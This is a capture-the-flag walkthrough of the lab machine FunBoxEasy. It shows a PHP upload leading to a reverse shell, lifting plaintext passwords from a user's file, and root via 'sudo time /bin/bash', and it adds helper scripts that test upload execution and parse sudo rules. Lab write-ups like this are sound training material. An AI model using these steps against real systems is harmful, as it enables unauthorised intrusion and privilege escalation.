
OffSec PG - FunBoxEasy

Enumeration

Machine IP → 192.168.101.111

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.101.111

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port   Service   Other details (if any)
22     SSH       OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80     HTTP      Apache httpd 2.4.41 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u http://192.168.101.111 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • robots.txt
  • index.html
  • index.php
  • profile.php (302)
  • header.php
  • registration.php
  • logout.php
  • dashboard.php (302)
  • leftbar.php
  • forgot-password.php
  • hitcounter.txt
  • icons/ (403)
  • store/
  • admin/
  • secret/
  • gym/

The robots.txt file contains a Disallow entry for gym, which gobuster had already found.


Exploitation

Looking at the store directory, there is a book store with an admin login at the bottom of the page. The admin panel can add a new book, and the add-book form includes a file upload. The uploaded file is rendered as an image when viewing the book list via the publisher list. Packt Publishing was chosen as the publisher because it had 0 books.

The uploaded file can also be requested directly at /store/bootstrap/img/test.php. The PHP file initially contained only <?php echo "Hello Test"; ?> to confirm that the server actually executes uploaded PHP instead of serving it back as text. It did execute when that location was visited, so the contents were replaced with the pentestmonkey PHP reverse shell.

With netcat listening, visiting the file gives a reverse shell on the system as the web server user. This also gave the user flag.
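The "Hello Test" check above is worth doing with a unique marker rather than a fixed string, and from curl rather than a browser, so a stale file or a raw-served PHP source (whose `<?php` tags a browser hides) cannot be mistaken for execution. The helper below is an added example and not part of the original post or the target application; the probe URL, the marker format and the canned response bodies are all assumptions/constructed data.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): decide whether an uploaded .php
# file is executed by the server or merely served back as text.
# Assumption: we control the full file body and know the URL it lands at.

# Build a probe whose only output is a random marker. A positive result then
# cannot come from a leftover file or a page that happens to contain "Hello Test".
make_probe() {
  marker="$1"
  printf '<?php echo "%s"; ?>\n' "$marker"
}

# Classify an HTTP response body for the probe URL.
#   executed - marker present and no PHP tags survive: the server ran the code
#   source   - PHP tags survive: file served raw (no RCE, but anything else
#              uploaded the same way is a source disclosure)
#   none     - marker absent: upload missing, renamed, or blocked
classify_probe_response() {
  marker="$1"
  body="$2"
  case "$body" in
    *"<?php"*)    echo source ;;   # checked first: raw source also contains the marker
    *"$marker"*)  echo executed ;;
    *)            echo none ;;
  esac
}

# Fetch the probe over HTTP and classify it (needs the target; not run here).
# Hypothetical usage: check_probe_url "$MARKER" http://192.168.101.111/store/bootstrap/img/test.php
check_probe_url() {
  marker="$1"; url="$2"
  body="$(curl -s "$url")" || { echo none; return; }
  classify_probe_response "$marker" "$body"
}

# Constructed demonstration against three canned bodies (no network used).
MARKER="probe-$(date +%s)-$$"
PROBE="$(make_probe "$MARKER")"
printf 'Probe file contents: %s\n' "$PROBE"
for body in "$MARKER" "$PROBE" "404 Not Found"; do
  printf '%-9s <- %s\n' "$(classify_probe_response "$MARKER" "$body")" "$body"
done
```

Only an "executed" verdict justifies swapping the probe for a reverse shell; a "source" verdict means the img directory is not handled by PHP and a different extension or location is needed.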


Privilege Escalation

User

Looking at the /etc/passwd file, there are 2 users of interest → tony and root. tony's home directory is readable by www-data and contains a password.txt file with the following contents →

ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin

The ssh password allows logging in to the machine over SSH as user tony.

Root

Looking at the sudo capabilities of the user tony (sudo -l), the interesting entries were whois, finger, time and cancel. Of these, only time was actually installed on the machine. time runs the command passed to it and reports how long that command took to execute. Since it is allowed via sudo, the command it spawns runs as root, so passing it a shell escalates privileges.

Therefore, sudo time /bin/bash gives a root shell and thus the root flag.
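The triage above (list the sudo-allowed commands, then discard the ones that are not installed) can be scripted. The following is an added example, not part of the original post; the sudo -l text is constructed from the four entries the post names, and the hostname and the NOPASSWD tags are assumptions that the post does not state.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): triage `sudo -l` output the way
# the post does by hand, then keep only commands actually present on the box.

# Constructed `sudo -l` output modelled on the four entries the post names.
# Hostname "funbox" and the NOPASSWD tags are assumptions, not from the post.
SUDO_L_SAMPLE='Matching Defaults entries for tony on funbox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tony may run the following commands on funbox:
    (root) NOPASSWD: /usr/bin/whois, /usr/bin/finger
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /usr/bin/cancel'

# Print one command per line from the "(runas) ..." lines that follow the
# "may run the following commands" header. Handles comma-separated lists and
# leading tags such as NOPASSWD: or SETENV:.
sudo_commands() {
  awk '
    /may run the following commands/ { in_cmds = 1; next }
    in_cmds && /^[[:space:]]*\(/ {
      line = $0
      sub(/^[^)]*\)[[:space:]]*/, "", line)          # drop the "(root)" runas spec
      while (sub(/^[A-Z_]+:[[:space:]]*/, "", line)); # drop NOPASSWD:, SETENV:, ...
      n = split(line, parts, /,[[:space:]]*/)
      for (i = 1; i <= n; i++) if (parts[i] != "") print parts[i]
    }'
}

# Keep only commands whose binary exists and is executable on this host. A sudo
# rule for an uninstalled binary is useless (the post found three such rules).
installed_only() {
  while IFS= read -r cmd; do
    path="${cmd%% *}"            # strip any arguments fixed in the rule
    if [ -x "$path" ]; then
      printf '%s\n' "$cmd"
    fi
  done
}

# Full pipeline: sudo -l text in, installed sudo-able commands out.
candidates_from_sudo_l() {
  printf '%s\n' "$1" | sudo_commands | installed_only
}

echo "Allowed via sudo:"
printf '%s\n' "$SUDO_L_SAMPLE" | sudo_commands
echo "Of those, installed on this host:"
candidates_from_sudo_l "$SUDO_L_SAMPLE"
```

On the target the second list would contain only /usr/bin/time, which is then checked against a reference such as GTFOBins; for time the escalation is exactly the post's sudo time /bin/bash, since whatever time launches inherits root from sudo.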


This post is licensed under CC BY 4.0 by the author.